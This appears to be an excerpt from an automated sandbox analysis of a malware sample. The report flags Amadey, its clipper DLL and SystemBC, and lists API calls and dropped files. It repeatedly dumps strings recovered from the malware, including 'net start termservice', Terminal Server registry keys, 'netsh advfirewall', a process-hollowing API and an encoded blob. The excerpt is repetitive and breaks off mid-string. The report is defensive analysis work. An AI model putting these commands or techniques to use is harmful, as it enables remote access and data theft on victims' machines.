Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: EnumSystemLocalesW,	1_2_0044825C
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	1_2_004522D9
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,	1_2_0045252C
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_00452652
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,	1_2_00452758
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,	1_2_0044877E
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_00452827
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	1_2_00451EC6
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: EnumSystemLocalesW,	3_2_00452168
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: EnumSystemLocalesW,	3_2_004521B3
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: EnumSystemLocalesW,	3_2_0045224E
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: EnumSystemLocalesW,	3_2_0044825C
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_004522D9
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,	3_2_0045252C
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_00452652
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,	3_2_00452758
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,	3_2_0044877E
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_00452827
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	3_2_00451EC6

Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe

Code function: 0_2_0008A655 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_0008A655

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe

0_2_000661F0

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe

Code function: 0_2_0009E72E _free,_free,_free,GetTimeZoneInformation,_free,

0_2_0009E72E

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe

Code function: 0_2_000693D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

0_2_000693D0

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: Fp80Ocyhqm.exe, type: SAMPLE
Source: Yara match	File source: 4.2.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.Fp80Ocyhqm.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Fp80Ocyhqm.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe, type: DROPPED

Yara detected SystemBC

Source: Yara match	File source: 00000006.00000003.1487197253.0000000004774000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1433439906.0000000004774000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cubrodriver.exe PID: 7764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fvvb.exe PID: 7904, type: MEMORYSTR

Remote Access Functionality

Yara detected SystemBC

Source: Yara match	File source: 00000006.00000003.1487197253.0000000004774000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1433439906.0000000004774000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cubrodriver.exe PID: 7764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fvvb.exe PID: 7904, type: MEMORYSTR

Contains functionality to start a terminal service

Source: Fp80Ocyhqm.exe	String found in binary or memory: net start termservice
Source: Fp80Ocyhqm.exe, 00000000.00000003.1302021933.0000000006C11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: Fp80Ocyhqm.exe, 00000000.00000003.1302021933.0000000006C11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Fp80Ocyhqm.exe, 00000000.00000000.1296939095.00000000000B1000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: net start termservice
Source: Fp80Ocyhqm.exe, 00000000.00000000.1296939095.00000000000B1000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Fp80Ocyhqm.exe, 00000000.00000002.1305562178.00000000000B1000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: net start termservice
Source: Fp80Ocyhqm.exe, 00000000.00000002.1305562178.00000000000B1000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000001.00000002.3779325935.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000001.00000002.3779325935.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 00000001.00000000.1304853038.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000001.00000000.1304853038.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr 